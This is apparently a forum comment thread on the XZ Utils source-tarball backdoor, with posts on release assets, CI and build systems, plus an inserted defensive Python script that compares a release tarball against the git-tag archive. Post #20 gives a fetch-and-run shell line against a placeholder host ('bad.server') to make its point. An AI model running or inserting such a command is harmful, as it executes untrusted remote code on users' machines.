XZ Struck By Malicious Code That Could Allow Unauthorized Remote System Access


  • #11
    Originally posted by darkbasic View Post

    It's the *source* tarball which contains the final piece of the malicious code, not the binaries. It's no coincidence that starting from today Arch Linux switched to the git tag lol
    Probably it's the extra assets that are published in the release page on GitHub (the ones called differently than "Source Code (zip)" and "Source Code (tar.gz)") since the standard two are downloading from ".../archive/refs/tags/v5.6.1.{tar.gz,.zip}" instead of ".../releases/download/v5.6.1/xz-5.6.1.{tar.gz,.zip}".

    Probably the ones from "refs/tags" are built automatically by GitHub when downloading them (they don't even have the size visible in the page).


  • #12
    Why don't they use CI to create the release tarballs? Or do they? CI infra compromised then?


  • #13
    Originally posted by avis View Post
    Almost all distros, aside from maybe RHEL, rush to push upstream packages without ever verifying that the source code has not been tampered with.

    ...

    This is not an XZ issue. This is the issue of the entire Linux ecosystem. The issue of safety, security, trust and verifiability.
    The ecosystem is fine tyvm.

    "Almost all distros" do not rush to push the latest and greatest. Even rolling releases have unstable and testing repositories. Enterprise grade distributions are based on consumer facing counterparts that validate packages further. It's actually a very healthy setup. This was injected on Feb 24 and fixed a few days over a month later. That's pretty good in my book.


  • #14
    Originally posted by avis
    roliverio

    There have been zero instances of Microsoft/Apple/Google distributing malware in their entire 30+ years history. If you're concerned about "telemetry" it's different. It doesn't allow these companies to fuck with your systems or gain unauthorized access like in this situation.
    Yeah fking right!

    Be careful the next time you download a game off the Microsoft Store on Windows, as there's dangerous malware hiding in clones of several popular games. Before you download anything, make sure it's the actual app and not a fake.

    According to the security research firm Check Point (via Bleeping Computer), there are clones of popular games like Temple Run and Subway Surfers appearing on the Microsoft Store that contain the Electron Bot malware.

    The malware is a backdoor that gives the attacker complete control over infected machines with the goal of social media promotion and click fraud through Facebook, Google, YouTube, and Sound Cloud.
    Good luck checking their code!

    Oh, so-called 'telemetry' is malware introduced by the vendor himself.


  • #15
    Originally posted by avis
    roliverio

    Blacklisted immediately and goodbye. There have been zero instances of Microsoft/Apple/Google distributing malware in their entire 30+ years history. If you're concerned about "telemetry" it's different. It doesn't allow these companies to fuck with your systems or gain unauthorized access like in this situation.
    You probably missed the days when developers were urging Microsoft to keep VB out of the Office suite. They didn't and created a prime vector for a whole new generation of malware that did not exist before.


  • #16
    Originally posted by bug77 View Post

    You probably missed the days when developers were urging Microsoft to keep VB out of the Office suite. They didn't and created a prime vector for a whole new generation of malware that did not exist before.
    This is 100% unrelated and VB was a single toggle to switch off/disable and not deal with possibly malicious macros, if you ever were concerned about this attack vector.

    That roliverio guy heavily implied and joked about MS/Apple/Google actually distributing malware (an interpreter is not malware because otherwise a compiler in your distro is ALSO an attack vector and Python gets installed by default in pretty much all distros) and I'm sad these companies won't sue him for libel.
    Last edited by avis; 29 March 2024, 01:35 PM.


  • #17
    Originally posted by RealNC View Post
    Why don't they use CI to create the release tarballs? Or do they? CI infra compromised then?
    Now if they used a build system that doesn't require running random binaries distributed in the "source" tarball, this kind of "release tarball" would not be needed at all.
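A defender-side check for the gap between the uploaded release asset and the git-tag archive that #11 and #17 circle around, added here as an example and not code posted anywhere in this thread: it strips each archive's top-level directory, then reports files present only in the release tarball, only in the tag archive, or present in both with different contents. Both archives are constructed in memory, and the file names inside them are made up for the sample.

```python
import hashlib
import io
import tarfile

def _digests(data: bytes) -> dict:
    """Map each regular file (top-level dir stripped) to its SHA-256."""
    out = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for member in tar:
            if not member.isfile():
                continue
            # "xz-5.6.1/m4/foo.m4" -> "m4/foo.m4"
            rel = member.name.split("/", 1)[-1]
            out[rel] = hashlib.sha256(tar.extractfile(member).read()).hexdigest()
    return out

def compare_archives(release: bytes, git_archive: bytes) -> dict:
    """Diff a release asset against the archive GitHub generates from the tag."""
    rel, git = _digests(release), _digests(git_archive)
    return {
        "only_in_release": sorted(rel.keys() - git.keys()),
        "only_in_git": sorted(git.keys() - rel.keys()),
        "modified": sorted(p for p in rel.keys() & git.keys() if rel[p] != git[p]),
    }

def _build_tar(top: str, files: dict) -> bytes:
    """Constructed sample archive: {relative path: bytes} under one top dir."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, content in files.items():
            info = tarfile.TarInfo(f"{top}/{path}")
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()

# Constructed samples: what the tag archive would hold vs. the uploaded asset.
GIT_ARCHIVE = _build_tar("xz-5.6.1", {
    "configure.ac": b"AC_INIT([xz])\n",
    "m4/gettext.m4": b"dnl gettext macros\n",
})
RELEASE_TARBALL = _build_tar("xz-5.6.1", {
    "configure.ac": b"AC_INIT([xz])\n",
    "m4/gettext.m4": b"dnl gettext macros\ndnl one extra line\n",  # changed
    "m4/release-only.m4": b"dnl not in git; made-up name for the sample\n",
    "configure": b"#!/bin/sh\n# generated by autoconf, normally absent from git\n",
})

if __name__ == "__main__":
    # Every entry needs a human decision: "configure" is expected, the rest is not.
    print(compare_archives(RELEASE_TARBALL, GIT_ARCHIVE))
```

Generated files such as `configure` legitimately appear only in the release asset, so the output is a review list rather than a verdict; anything else in "only_in_release" or "modified" is what a packager should read before building.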


  • #18
    Originally posted by uxmkt
    You dense MF. They would have done the same, just with different syntax.
    No, because with CMake you only run the source code, not random binaries.


  • #19
    All the details are here: https://lwn.net/ml/oss-security/2024...3.anarazel.de/


  • #20
    Originally posted by archkde View Post

    No, because with CMake you only run the source code, not random binaries.
    The build system is irrelevant. You can obfuscate whatever you want and run wget https://bad.server/script.sh && sh script.sh and do whatever you please.

    All the code Linux distros include must be manually inspected (and run through automated systems as well, since people don't always catch/see everything) and verified for being safe, period.